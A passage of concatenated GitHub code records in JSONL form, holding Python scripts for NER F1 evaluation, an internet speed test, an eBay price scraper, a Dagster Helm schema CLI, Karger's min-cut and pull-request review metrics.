Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8714495792","text":"tp_per = 0\nfp_per = 0\nfn_per = 0\n\ntp_org = 0\nfp_org = 0\nfn_org = 0\n\ntp_loc = 0\nfp_loc = 0\nfn_loc = 0\n\nwith open(\n \"./predictions.txt\", \"r\"\n) as output_file:\n outputs = output_file.readlines()\n\nfor line in outputs:\n splitted_line = line.replace(\"\\n\", \"\").split(\" \")\n if len(splitted_line) > 2:\n if splitted_line[1] == \"location\":\n if splitted_line[2] == \"location\":\n tp_loc += 1\n else:\n fn_loc += 1\n if splitted_line[2] == \"person\":\n fp_per += 1\n if splitted_line[2] == \"organization\":\n fp_org += 1\n elif splitted_line[1] == \"person\":\n if splitted_line[2] == \"person\":\n tp_per += 1\n else:\n fn_per += 1\n if splitted_line[2] == \"location\":\n fp_loc += 1\n if splitted_line[2] == \"organization\":\n fp_org += 1\n elif splitted_line[1] == \"organization\":\n if splitted_line[2] == \"organization\":\n tp_org += 1\n else:\n fn_org += 1\n if splitted_line[2] == \"person\":\n fp_per += 1\n if splitted_line[2] == \"location\":\n fp_loc += 1\n elif splitted_line[2] == \"organization\":\n fp_org += 1\n elif splitted_line[2] == \"person\":\n fp_per += 1\n elif splitted_line[2] == \"location\":\n fp_loc += 1\n\nprint(\"TP LOC \", tp_loc)\nprint(\"FP LOC \", fp_loc)\nprint(\"FN LOC \", fn_loc)\np_loc = tp_loc / (fp_loc + tp_loc)\nr_loc = tp_loc / (fn_loc + tp_loc)\nf_loc = 2 * (p_loc * r_loc) / (p_loc + r_loc)\nprint(\"F-1 Loc : \", f_loc)\n\n\nprint(\"TP Per \", tp_per)\nprint(\"FP Per \", fp_per)\np_per = tp_per / (fp_per + tp_per)\nr_per = tp_per / (fn_per + tp_per)\nf_per = 2 * (p_per * r_per) / (p_per + r_per)\nprint(\"F-1 Per : \", f_per)\n\nprint(\"FN Per \", fn_per)\nprint(\"TP Org \", tp_org)\nprint(\"FP Org \", fp_org)\np_org = tp_org / (fp_org + tp_org)\nr_org = tp_org / (fn_org + tp_org)\nf_org = 2 * (p_org * r_org) / (p_org + r_org)\nprint(\"F-1 org : \", f_org)\n\nprint(\"F-1 macro : \", (f_org + f_per + f_loc) / 3)\nprint(\"F1 micro:\", ()) ","repo_name":"Emvista/DWIE-FR","sub_path":"experiments/eval_tests_datasets_global.py","file_name":"eval_tests_datasets_global.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34692764501","text":"import speedtest\r\nimport datetime\r\n\r\ndef gcdt():\r\n GCDT = datetime.datetime.now()\r\n return GCDT\r\n\r\n\r\ndef spdtest():\r\n GCDT=gcdt()\r\n print(\"[{}] Initialization for Upload/Download Speed Test...\".format(GCDT))\r\n server=\"www.google.com\"\r\n s=speedtest.Speedtest()\r\n #s.get_servers(server)\r\n s.get_best_server()\r\n GCDT = gcdt()\r\n print(\"[{}] Calculation for Downloading Speed\".format(GCDT)),\r\n print(\"= {0:.1f} MBytes\".format(s.download()/1024/1024))\r\n GCDT = gcdt()\r\n print(\"[{}] Calculation for Uploading Speed\".format(GCDT)),\r\n print(\"= {0:.1f} MBytes\".format(s.upload()/1024/1024))\r\n #print (s.results.share())\r\n\r\n\r\ndef main():\r\n while(1):\r\n try:\r\n spdtest()\r\n except:\r\n GCDT = gcdt()\r\n print(\"[{}] Unable to connect to Internet.:<\".format(GCDT))\r\n\r\n\r\n# script starts here.\r\n\r\nmain()\r\n","repo_name":"robertcyc/P015_speedTest","sub_path":"P015_speedTest.py","file_name":"P015_speedTest.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"5363143090","text":"from bs4 import BeautifulSoup\nimport requests\nfrom urllib.parse import urljoin\nfrom re import sub\nfrom decimal import Decimal\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom flask import Markup\nfrom urllib.parse import urlparse\nimport logging\n\nimport time\n\n# Objekt für einzelne Suchen\nclass SearchItem:\n def __init__(self, url):\n self.url = url\n self.all_prices = []\n self.quantity = 0\n self.quantity_ignored = 0\n self.search_query = \"\"\n self.url_next_page = \"\"\n self.searched = False\n self.error = \"\"\n\n def get_search_query(self):\n return self.search_query\n\n def get_percentile(self, perc):\n # rint(self.all_prices)\n return np.percentile(self.all_prices, perc).round(2)\n\n def get_quantity(self):\n return self.quantity\n\n def get_quantity_ignored(self):\n return self.quantity_ignored\n\n\n# Plattform\nclass Plattform:\n \"\"\"\n Zentrale Klasse für das Crawlen.\n Über init einrichten. Dann über .fetch() crawlen.\n \"\"\"\n\n def __init__(self, urls=[], keywords=[]):\n \"\"\"\n Initialisiert die Klasse.\n Zu übergebende Parameter: urls, keywords\n \"\"\"\n logging.basicConfig(\n format=\"%(asctime)s %(message)s\", filename=\"logging.log\", level=logging.INFO\n )\n self.base_url_ebay_kleinanzeigen = \"https://www.ebay-kleinanzeigen.de/\"\n self.base_url_ebay_de = \"https://www.ebay.de/\"\n self.max_articles = 1000\n self.urls = urls\n\n self.keywords = [element.lower() for element in keywords]\n # print(self.keywords)\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\"\n }\n self.proxies = {\n \"http\": None,\n \"https\": None,\n }\n search_items = []\n for url in urls:\n # Für jeden übergebenen Link wird ein SearchItem angelegt. Hier wird auch direkt gecheckt,\n # ob die URL valid und ob es sich um die mobile Website handelt.\n if self.uri_validator(url) == True:\n print(\"--------\")\n logging.info(\"URL: \" + url)\n print(\"--------\")\n search_items.append(SearchItem(self.get_web_version(url)))\n self.search_items = search_items\n\n def get_web_version(self, url):\n \"\"\"\n Funktion checkt, ob es sich bei dem Link um die mobile Website hält. Wenn ja, wird der Link zur Desktopversion geholt.\n\n Todo: Es fehlt noch der Teil für eBay.de\n \"\"\"\n # print(url)\n if \"m.ebay-kleinanzeigen\" in url:\n print(\"Mobile version detected!\")\n r = requests.get(url, headers=self.headers, proxies=self.proxies)\n doc = BeautifulSoup(r.text.replace(\"​\", \"\"), \"html.parser\")\n url = urljoin(\n self.base_url_ebay_kleinanzeigen,\n doc.find(id=\"footer-webversion-link\").get(\"href\"),\n )\n\n return url\n\n def uri_validator(self, x):\n \"\"\"\n Validiert ein URL\n \"\"\"\n try:\n result = urlparse(x)\n return all([result.scheme, result.netloc, result.path])\n except:\n return False\n\n def set_max_articles(self, max_articles):\n \"\"\"\n Setzt die maximal zu crawlenden Artikel.\n \"\"\"\n self.max_articles = max_articles if max_articles > 0 else 1000\n\n def fetch_url(self, url):\n \"\"\"\n Holt eine URL mittels requests und liefert das Response-Objekt zurück.\n \"\"\"\n try:\n # print('...fetching with headers',url)\n r = requests.get(url, headers=self.headers, proxies=self.proxies)\n r.raise_for_status()\n return r\n except:\n # print('fetch_url>except!', url)\n print(r.status_code)\n\n return r\n\n def fetch(self):\n \"\"\"\n .fetch crawled jede URL.\n Keine Parameter. 
Bei Erfolg True, bei einem Fehler False.\n \"\"\"\n if len(self.search_items) == 0:\n return False\n\n result = []\n for search_item in self.search_items:\n # https://www.ebay-kleinanzeigen.de/s-boote-bootszubehoer/detmold/jolle/k0c211l1792r30\n\n if \"ebay-kleinanzeigen.de\" in search_item.url:\n result.append(self.fetch_page_ebay_kleinanzeigen(search_item))\n elif \"ebay.de\" in search_item.url:\n result.append(self.fetch_page_ebay_de(search_item))\n else:\n print(\"Link unbekannt! -> \", search_item.url)\n # Momentan noch nicht implementiert!\n # elif search_item.site == 'ebay.de':\n # result.append(self.fetch_page_ebay_de(search_item))\n # print(result)\n for res in result:\n if res == False:\n return False\n return True\n\n def fetch_page_ebay_kleinanzeigen(self, search_item):\n \"\"\"Hole die Artikel der Seite.\n Übergabe von zu holender URL + aktuelle Anzahl der Artikel.\n Weitere Seiten werden über Rekursion bearbeitet.\n\n Rückgabe: Alle Artikelpreise als list, Anzahl der bearbeiteten Artikel\n \"\"\"\n keywords = self.keywords\n\n # Artikel holen\n article = self.fetch_url(search_item.url)\n if article == False:\n return False\n\n doc = BeautifulSoup(article.text.replace(\"​\", \"\"), \"html.parser\")\n doc_search_query = doc.find(id=\"site-search-query\")\n\n # Falls der Titel 'Security Violation', mit False zurück\n if article.status_code == 503:\n search_item.error = doc.select_one(\"title\").text.strip()\n print(\"Error-Code: \", article.status_code)\n # print(doc)\n return False\n if doc.select_one(\"title\").text.strip() == \"Security Violation (503)\":\n print(\"Security Violation (503)\")\n # print(doc)\n search_item.error = doc.select_one(\"title\").text.strip()\n return False\n elif doc_search_query is None:\n print(\"None\")\n # print(doc)\n search_item.error = \"None\"\n return False\n\n # Suchstring speichern\n search_item.search_query = doc_search_query.get(\"value\")\n\n all_prices = []\n for element in doc.select(\".aditem\"):\n # Link auf Artikel\n # link = element.select_one('.ellipsis').get('href')\n\n # Titel holen\n title = element.select_one(\".ellipsis\").text.strip().lower()\n # Titel nach Keywords ausschließen\n if [title for keyword in keywords if (keyword in title)]:\n # print('Keyword!Title')\n search_item.quantity_ignored += 1\n continue\n # Anreisser-Description nach Keywords ausschließen\n descr = element.select_one(\".aditem-main p\").text.strip().lower()\n if [descr for keyword in keywords if (keyword in descr)]:\n # print('Keyword!Descr')\n search_item.quantity_ignored += 1\n continue\n\n # Preis holen\n price = element.select_one(\".aditem-details\").strong.text.strip()\n \n # Preis säubern\n price = self.clean_price( price)\n if price == False:\n search_item.quantity_ignored += 1\n continue\n \n # print(\" # \", title, price)\n search_item.quantity += 1\n all_prices.append(price)\n\n # Nächste Seite aufrufen\n next_page = doc.select_one(\".pagination-next\")\n # print(next_page)\n # Wenn Link auf nächste Seite und Anzahl der Anzeigen nicht über self.max_articles...\n if next_page and search_item.quantity < self.max_articles:\n search_item.url_next_page = urljoin(\n self.base_url_ebay_kleinanzeigen, next_page.get(\"href\")\n )\n # print(url_next_page)\n time.sleep(0.4)\n print(\"next page!\", search_item.quantity)\n self.fetch_page_ebay_kleinanzeigen(search_item)\n\n if doc_search_query.get(\"value\") in search_item.all_prices:\n print(\"alle_preise: url schon vorhanden!\", doc_search_query.get(\"value\"))\n 
search_item.all_prices.extend(all_prices)\n else:\n print(\n \"alle_preise: url noch nicht vorhanden!\", doc_search_query.get(\"value\")\n )\n search_item.all_prices = all_prices\n search_item.searched = True\n self.searched = True\n return True\n\n def fetch_page_ebay_de(self, search_item):\n \"\"\"Hole die Artikel der Seite.\n Übergabe von zu holender URL + aktuelle Anzahl der Artikel.\n Weitere Seiten werden über Rekursion bearbeitet.\n\n Rückgabe: Alle Artikelpreise als list, Anzahl der bearbeiteten Artikel\n \"\"\"\n keywords = self.keywords\n # Artikel holen\n article = self.fetch_url(search_item.url)\n if article == False:\n return False\n\n doc = BeautifulSoup(article.text.replace(\"​\", \"\"), \"html.parser\")\n doc_search_query = doc.find(id=\"gh-ac\")\n\n # Falls der Titel 'Security Violation', mit False zurück\n if article.status_code == 503:\n search_item.error = doc.select_one(\"title\").text.strip()\n print(\"Error-Code: \", article.status_code)\n # print(doc)\n return False\n if doc.select_one(\"title\").text.strip() == \"Security Violation (503)\":\n print(\"Security Violation (503)\")\n # print(doc)\n search_item.error = doc.select_one(\"title\").text.strip()\n return False\n elif doc_search_query is None:\n print(\"None\")\n # print(doc)\n search_item.error = \"None\"\n return False\n\n # Suchstring speichern\n search_item.search_query = doc_search_query.get(\"value\")\n\n all_prices = []\n for element in doc.select(\".sresult\"):\n # Link auf Artikel\n # link = element.select_one('.ellipsis').get('href')\n\n # Titel holen\n title = (\n element.select_one(\".lvtitle\")\n .text.replace(\"Neues Angebot\", \"\")\n .strip()\n .lower()\n )\n # Titel nach Keywords ausschließen\n if [title for keyword in keywords if (keyword in title)]:\n # print('Keyword!Title')\n search_item.quantity_ignored += 1\n continue\n\n # Preis holen\n price = element.select_one(\".lvprice\").text.strip()\n \n # Preis säubern\n price = self.clean_price( price)\n if price == False:\n search_item.quantity_ignored += 1\n continue\n\n # print(' # ', title, price)\n search_item.quantity += 1\n all_prices.append(price)\n # print(title,': ', price)\n\n # Nächste Seite aufrufen\n next_page = doc.select_one(\".pagn-next .gspr\")\n # print(next_page)\n # Wenn Link auf nächste Seite und Anzahl der Anzeigen nicht über self.max_articles...\n if next_page and search_item.quantity < self.max_articles:\n search_item.url_next_page = urljoin(\n self.base_url_ebay_de, next_page.get(\"href\")\n )\n # print(url_next_page)\n time.sleep(0.4)\n print(\"next page!\", search_item.quantity)\n self.fetch_page_ebay_kleinanzeigen(search_item)\n\n if doc_search_query.get(\"value\") in search_item.all_prices:\n print(\"alle_preise: url schon vorhanden!\", doc_search_query.get(\"value\"))\n search_item.all_prices.extend(all_prices)\n else:\n print(\n \"alle_preise: url noch nicht vorhanden!\", doc_search_query.get(\"value\")\n )\n search_item.all_prices = all_prices\n search_item.searched = True\n self.searched = True\n return True\n\n def clean_price( self, price):\n '''\n Original Preis übergeben und verschiedene Optionen filtern. False wird zurückgegeben, wenn der Preis nicht eindeutig ist.\n '''\n cleaning_strings_cut = ('UVP','(','Bisher')\n\n\n if price == \"VB\" or price.strip() == \"\" or \"bis\" in price or \"Zu verschenken\" in price:\n return False\n\n for string_cut in cleaning_strings_cut:\n if string_cut in price:\n price = price[:price.index(string_cut)].strip()\n \n try:\n if '.' 
in price:\n price = price.replace('.','')\n \n price = float(\n price.replace(\" €\", \"\")\n .replace(\"EUR\", \"\")\n .replace(',','.')\n .replace(\" VB\", \"\")\n .strip()\n )\n except:\n return False\n return price\n\n def get_error(self):\n \"\"\"\n Liefert alle bisherigen Fehler zurück\n \"\"\"\n error = \"\"\n for search_item in self.search_items:\n if not search_item.error == \"\":\n error += Markup(search_item.url + \": \" + search_item.error)\n return error\n\n def get_search_querys(self):\n \"\"\"\n Liefert zur Anzeige die Suchbegriffe.\n \"\"\"\n if len(self.search_items) > 1:\n search_querys_text = \"\"\n for search_item in self.search_items:\n if not search_querys_text == \"\":\n search_querys_text += \" - \"\n search_querys_text += search_item.search_query\n else:\n search_querys_text = self.search_items[0].search_query\n return search_querys_text\n\n def get_plot(self):\n \"\"\"\n Generiert den Boxplot für die URLs.\n Rückgabe ist ein png.\n \"\"\"\n import io\n import base64\n import matplotlib\n from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\n matplotlib.use(\"agg\")\n fig, axs = plt.subplots()\n\n all_prices_list = []\n labels_list = []\n for search_item in self.search_items:\n all_prices_list.append(search_item.all_prices)\n labels_list.append(search_item.search_query)\n\n axs.boxplot(all_prices_list, labels=labels_list)\n\n # Convert plot to PNG image\n pngImage = io.BytesIO()\n FigureCanvas(fig).print_png(pngImage)\n\n # Encode PNG image to base64 string\n pngImageB64String = \"data:image/png;base64,\"\n pngImageB64String += base64.b64encode(pngImage.getvalue()).decode(\"utf8\")\n\n return pngImageB64String\n","repo_name":"jkopka/price_tracker","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14869,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9882071357","text":"import os\nimport subprocess\n\nimport click\n\nfrom .charts.dagster.values import DagsterHelmValues\nfrom .charts.dagster_user_deployments.values import DagsterUserDeploymentsHelmValues\n\n\ndef git_repo_root():\n return subprocess.check_output([\"git\", \"rev-parse\", \"--show-toplevel\"]).decode(\"utf-8\").strip()\n\n\nCLI_HELP = \"\"\"Tools to help generate the schema file for the Dagster Helm chart.\n\"\"\"\n\n\n@click.group(help=CLI_HELP)\ndef cli():\n pass\n\n\n@cli.group()\ndef schema():\n \"\"\"Generates the `values.schema.json` file according to user specified pydantic models.\"\"\"\n\n\n@schema.command()\ndef show():\n \"\"\"Displays the json schema on the console.\"\"\"\n click.echo(\"--- Dagster Helm Values ---\")\n click.echo(DagsterHelmValues.schema_json(indent=4))\n\n click.echo(\"\\n\\n\")\n click.echo(\"--- Dagster User Deployment Helm Values ---\")\n click.echo(DagsterUserDeploymentsHelmValues.schema_json(indent=4))\n\n\n@schema.command()\ndef apply():\n \"\"\"Saves the json schema in the Helm `values.schema.json`.\"\"\"\n helm_values_path_tuples = {\n (DagsterHelmValues, os.path.join(git_repo_root(), \"helm\", \"dagster\", \"values.schema.json\")),\n (\n DagsterUserDeploymentsHelmValues,\n os.path.join(\n git_repo_root(),\n \"helm\",\n \"dagster\",\n \"charts\",\n \"dagster-user-deployments\",\n \"values.schema.json\",\n ),\n ),\n }\n\n for helm_values, path in helm_values_path_tuples:\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write(helm_values.schema_json(indent=4))\n f.write(\"\\n\")\n\n\ndef main():\n click_cli = 
click.CommandCollection(sources=[cli], help=CLI_HELP)\n click_cli()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dagster-io/dagster","sub_path":"helm/dagster/schema/schema/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"17871037838","text":"from random import randint\n\n\nclass KargerMinCutter:\n def __init__(self, graph_file):\n self._graph = {}\n self._total_edges = 0\n with open(graph_file) as file:\n for index, line in enumerate(file):\n numbers = [int(number) for number in line.split()]\n self._graph[numbers[0]] = numbers[1:]\n self._total_edges += len(numbers[1:])\n\n def find_min_cut(self):\n min_cut = 0\n while len(self._graph) > 2:\n v1, v2 = self._pick_random_edge()\n self._total_edges -= len(self._graph[v1])\n self._total_edges -= len(self._graph[v2])\n self._graph[v1].extend(self._graph[v2])\n for vertex in self._graph[v2]:\n self._graph[vertex].remove(v2)\n self._graph[vertex].append(v1)\n self._graph[v1] = list(filter(lambda v: v != v1, self._graph[v1]))\n self._total_edges += len(self._graph[v1])\n self._graph.pop(v2)\n for edges in self._graph.values():\n min_cut = len(edges)\n return min_cut\n\n def _pick_random_edge(self):\n rand_edge = randint(0, self._total_edges - 1)\n for vertex, vertex_edges in self._graph.items():\n if len(vertex_edges) <= rand_edge:\n rand_edge -= len(vertex_edges)\n else:\n from_vertex = vertex\n to_vertex = vertex_edges[rand_edge]\n return from_vertex, to_vertex\n\nif __name__ == \"__main__\":\n min_cut = 99999\n for i in range(40000):\n min_cutter = KargerMinCutter('assignment3.txt')\n cut = min_cutter.find_min_cut()\n if cut < min_cut:\n min_cut = cut\n print(min_cut)","repo_name":"mikemyl/algorithms-stanford","sub_path":"part_1/assignment3_karger_min_cut/app/min_cutter.py","file_name":"min_cutter.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"53"} +{"seq_id":"13199788279","text":"import sqlite3\n\n\nsite_list = [\n'reddit.com',\n'news.ycombinator.com',\n'feedly.com',\n'youtube.com',\n'test.com',\n'test2.com',\n]\n\ncon = sqlite3.connect(\"places.sqlite\") # first create an empty file to save the db\ncur = con.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS procrastinate ('procrastinate' text);\")\ncur.execute(\"DELETE FROM procrastinate;\")\n\nfor i in site_list:\n cur.execute(\"INSERT INTO procrastinate ('procrastinate') VALUES (?);\", (i,))\n\ncon.commit()\ncon.close()","repo_name":"mattarderne/firefox_explore","sub_path":"procrastinate.py","file_name":"procrastinate.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"26374157393","text":"import logging\n\nimport numpy as np\n\nfrom typing import Tuple, Dict, Any, List, Union\nfrom pathlib import Path\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom srcopsmetrics.create_bot_knowledge import load_previous_knowledge\nfrom srcopsmetrics.utils import convert_num2label, convert_score2num\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef retrieve_knowledge(knowledge_path: Path, project: str) -> Union[Dict[str, Any], None]:\n \"\"\"Retrieve knowledge (PRs) collected for a project.\"\"\"\n project_knowledge_path = knowledge_path.joinpath(\"./\" + f\"{project}\")\n pull_requests_data_path = 
project_knowledge_path.joinpath(\"./pull_requests.json\")\n\n data = load_previous_knowledge(project, pull_requests_data_path, \"PullRequest\")\n if data:\n return data\n else:\n _LOGGER.exception(\"No previous knowledge found for %s\" % project)\n return {}\n\n\ndef analyze_pr_for_project_data(pr_id: int, pr: Dict[str, Any], extracted_data: Dict[str, Any]):\n \"\"\"Extract project data from Pull Request.\"\"\"\n if not pr[\"reviews\"]:\n return extracted_data\n\n # Consider all approved reviews\n pr_approved_dt = [\n datetime.fromtimestamp(review[\"submitted_at\"])\n for review in pr[\"reviews\"].values()\n if review[\"state\"] == \"APPROVED\"\n ]\n\n if not pr_approved_dt:\n return extracted_data\n\n extracted_data[\"ids\"].append(pr_id)\n\n # PR created timestamp\n pr_created_dt = datetime.fromtimestamp(pr[\"created_at\"])\n extracted_data[\"created_dts\"].append(pr_created_dt)\n\n # PR first review timestamp (no matter the contributor)\n pr_first_review_dt = datetime.fromtimestamp([r for r in pr[\"reviews\"].values()][0][\"submitted_at\"])\n\n ttfr = (pr_first_review_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[\"TTFR\"].append(ttfr)\n\n mttfr = np.median(extracted_data[\"TTFR\"])\n extracted_data[\"MTTFR\"].append(mttfr)\n\n project_prs_size = pr[\"size\"]\n extracted_data[\"PRs_size\"].append(project_prs_size)\n extracted_data[\"encoded_PRs_size\"].append(convert_score2num(label=project_prs_size))\n\n # Take maximum to consider last approved if more than one contributor has to approve\n pr_approved_dt = max(pr_approved_dt)\n\n ttr = (pr_approved_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[\"TTR\"].append(ttr)\n\n mttr = np.median(extracted_data[\"TTR\"])\n extracted_data[\"MTTR\"].append(mttr)\n\n # PR reviews timestamps\n extracted_data[\"reviews_dts\"] += [r[\"submitted_at\"] for r in pr[\"reviews\"].values()]\n\n return extracted_data\n\n\ndef pre_process_project_data(data: Dict[str, Any]):\n \"\"\"Pre process of data for a given project repository.\"\"\"\n if not data:\n return {}\n pr_ids = sorted([int(k) for k in data.keys()])\n\n project_reviews_data = {}\n\n project_reviews_data[\"contributors\"] = []\n project_reviews_data[\"ids\"] = []\n project_reviews_data[\"created_dts\"] = []\n project_reviews_data[\"reviews_dts\"] = []\n\n project_reviews_data[\"TTFR\"] = [] # Time to First Review (TTFR) [hr]\n project_reviews_data[\"MTTFR\"] = [] # Median TTFR [hr]\n\n project_reviews_data[\"TTR\"] = [] # Time to Review (TTR) [hr]\n project_reviews_data[\"MTTR\"] = [] # Median TTR [hr]\n\n project_reviews_data[\"PRs_size\"] = [] # Pull Request length\n project_reviews_data[\"encoded_PRs_size\"] = [] # Pull Request length encoded\n\n for pr_id in pr_ids:\n pr = data[str(pr_id)]\n\n if pr[\"created_by\"] not in project_reviews_data[\"contributors\"]:\n project_reviews_data[\"contributors\"].append(pr[\"created_by\"])\n\n analyze_pr_for_project_data(pr_id=pr_id, pr=pr, extracted_data=project_reviews_data)\n\n project_reviews_data[\"last_review_time\"] = max(project_reviews_data[\"reviews_dts\"])\n\n # Encode Pull Request sizes for the contributor\n project_pr_median_size, project_length_score = convert_num2label(\n score=np.median(project_reviews_data[\"encoded_PRs_size\"])\n )\n project_reviews_data[\"median_pr_length\"] = project_pr_median_size\n project_reviews_data[\"median_pr_length_score\"] = project_length_score\n\n return project_reviews_data\n\n\ndef evaluate_reviewer_data(\n pr: Dict[str, Any],\n reviewer: str,\n review_submission_dt: 
datetime.timestamp,\n extracted_data: Dict[str, Any]\n):\n \"\"\"Evaluate reviewer data from reviews.\"\"\"\n if not pr[\"reviews\"]:\n return extracted_data\n\n dt_approved = [\n datetime.fromtimestamp(review[\"submitted_at\"])\n for review in pr[\"reviews\"].values()\n if review[\"state\"] == \"APPROVED\" and review[\"author\"] == reviewer\n ]\n\n if not dt_approved:\n return extracted_data\n\n # PR created timestamp\n pr_created_dt = datetime.fromtimestamp(pr[\"created_at\"])\n extracted_data[\"created_dts\"].append(pr_created_dt)\n\n pr_first_review_dt = datetime.fromtimestamp(review_submission_dt[0])\n ttfr = (pr_first_review_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[reviewer][\"TTFR\"] = ttfr\n\n mttfr = np.median(extracted_data[reviewer][\"TTFR\"])\n extracted_data[reviewer][\"MTTFR\"].append(mttfr)\n\n project_prs_size = pr[\"size\"]\n extracted_data[reviewer][\"PRs_size\"].append(project_prs_size)\n extracted_data[reviewer][\"encoded_PRs_size\"].append(convert_score2num(label=project_prs_size))\n\n # Take maximum to consider last approved if more than one contributor has to approve\n pr_approved_dt = max(dt_approved)\n\n ttr = (pr_approved_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[reviewer][\"TTR\"].append(ttr)\n\n mttr = np.median(extracted_data[reviewer][\"TTR\"])\n extracted_data[reviewer][\"MTTR\"].append(mttr)\n\n\ndef extract_review_data(\n pr_id: int,\n pr_author: str,\n contributor_review: Dict[str, Any],\n extracted_data: Dict[str, Any],\n reviews_submitted_dts_per_reviewer: Dict[str, Any]\n):\n \"\"\"Extract contributor data from Pull Request reviews.\"\"\"\n # Check reviews and discard comment of the author of the PR\n if contributor_review[\"author\"] == pr_author:\n return extracted_data\n\n if contributor_review[\"author\"] not in extracted_data[\"reviewers\"]:\n extracted_data[\"reviewers\"].append(contributor_review[\"author\"])\n extracted_data[contributor_review[\"author\"]] = {}\n extracted_data[contributor_review[\"author\"]][\"reviews\"] = {}\n extracted_data[contributor_review[\"author\"]][\"ids\"] = []\n extracted_data[contributor_review[\"author\"]][\"TTFR\"] = [] # Time to First Review (TTFR) [hr]\n extracted_data[contributor_review[\"author\"]][\"MTTFR\"] = [] # Median TTFR [hr]\n extracted_data[contributor_review[\"author\"]][\"TTR\"] = [] # Time to Review (TTR) [hr]\n extracted_data[contributor_review[\"author\"]][\"MTTR\"] = [] # Median TTR [hr]\n extracted_data[contributor_review[\"author\"]][\"PRs_size\"] = [] # Pull Request length\n extracted_data[contributor_review[\"author\"]][\"encoded_PRs_size\"] = [] # Pull Request length encoded\n\n if pr_id not in extracted_data[contributor_review[\"author\"]][\"reviews\"].keys():\n extracted_data[contributor_review[\"author\"]][\"reviews\"][pr_id] = [\n {\n \"words_count\": contributor_review[\"words_count\"],\n \"submitted_at\": contributor_review[\"submitted_at\"],\n \"state\": contributor_review[\"state\"],\n }\n ]\n else:\n extracted_data[contributor_review[\"author\"]][\"reviews\"][pr_id].append(\n {\n \"words_count\": contributor_review[\"words_count\"],\n \"submitted_at\": contributor_review[\"submitted_at\"],\n \"state\": contributor_review[\"state\"],\n }\n )\n\n if contributor_review[\"author\"] not in reviews_submitted_dts_per_reviewer.keys():\n reviews_submitted_dts_per_reviewer[contributor_review[\"author\"]] = [contributor_review[\"submitted_at\"]]\n else:\n 
reviews_submitted_dts_per_reviewer[contributor_review[\"author\"]].append(contributor_review[\"submitted_at\"])\n\n return extracted_data\n\n\ndef analyze_pr_for_contributor_data(pr_id: int, pr: Dict[str, Any], extracted_data: Dict[str, Any]):\n \"\"\"Extract project data from Pull Request.\"\"\"\n if not pr[\"reviews\"]:\n return extracted_data\n\n pr_author = pr[\"created_by\"]\n\n reviews_submitted_dts_per_reviewer = {}\n\n for review in pr[\"reviews\"].values():\n extract_review_data(\n pr_id=pr_id,\n pr_author=pr_author,\n contributor_review=review,\n extracted_data=extracted_data,\n reviews_submitted_dts_per_reviewer=reviews_submitted_dts_per_reviewer\n )\n\n for reviewer, review_submission_dt in reviews_submitted_dts_per_reviewer.items():\n\n evaluate_reviewer_data(\n pr=pr,\n reviewer=reviewer,\n review_submission_dt=review_submission_dt,\n extracted_data=extracted_data,\n )\n\n\ndef analyze_contributors_interaction(\n pr_interactions: Dict[str, int],\n pr_author: str,\n interactions_data: Dict[str, Dict[str, int]]\n):\n \"\"\"Analyze project contributors interactions.\"\"\"\n if not pr_interactions:\n return interactions_data\n\n for contributor, interaction_info in pr_interactions.items():\n if contributor != pr_author:\n # Check if it is a bot.\n if contributor not in interactions_data[pr_author].keys():\n pass\n else:\n interactions_data[pr_author][contributor] += interaction_info\n\n return interactions_data\n\n\ndef pre_process_contributors_data(data: Dict[str, Any], contributors: List[str]):\n \"\"\"Pre process of data for contributors in a project repository.\"\"\"\n pr_ids = sorted([int(k) for k in data.keys()])\n\n contributors_reviews_data = {}\n contributors_reviews_data[\"reviewers\"] = []\n contributors_reviews_data[\"created_dts\"] = []\n\n interactions = {}\n for contributor in contributors:\n contributor_interaction = dict.fromkeys(contributors, 0)\n interactions[contributor] = contributor_interaction\n\n for pr_id in pr_ids:\n pr = data[str(pr_id)]\n\n analyze_pr_for_contributor_data(pr_id=pr_id, pr=pr, extracted_data=contributors_reviews_data)\n\n analyze_contributors_interaction(\n pr_interactions=pr[\"interactions\"],\n pr_author=pr[\"created_by\"],\n interactions_data=interactions)\n\n for reviewer in contributors_reviews_data[\"reviewers\"]:\n\n number_reviews = 0\n reviews_length = []\n time_reviews = []\n\n for reviews in contributors_reviews_data[reviewer][\"reviews\"].values():\n number_reviews += len(reviews)\n review_words = 0\n for review in reviews:\n review_words += review[\"words_count\"]\n time_reviews.append(review[\"submitted_at\"])\n\n reviews_length.append(review_words)\n\n last_review_dt = max(time_reviews)\n\n contributors_reviews_data[reviewer][\"number_reviews\"] = number_reviews\n contributors_reviews_data[reviewer][\"median_review_length\"] = np.median(reviews_length)\n contributors_reviews_data[reviewer][\"last_review_time\"] = last_review_dt\n\n # Encode Pull Request sizes for the 